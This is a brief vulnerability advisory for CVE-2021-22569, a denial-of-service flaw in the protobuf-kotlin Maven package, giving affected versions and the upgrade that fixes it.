CVE-2021-22569

Denial Of Service in maven/com.google.protobuf/protobuf-kotlin

Identifiers

CVE-2021-22569, GHSA-wrvw-hg22-4m67, GMS-2022-6

Package Slug

maven/com.google.protobuf/protobuf-kotlin

Vulnerability

Denial Of Service

Description

An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses. We recommend upgrading libraries beyond the vulnerable versions.

Affected Versions

All versions before 3.18.2, all versions starting from 3.19.0 before 3.19.2

Solution

Upgrade to versions 3.18.2, 3.19.2 or above.

Last Modified

2022-01-19

source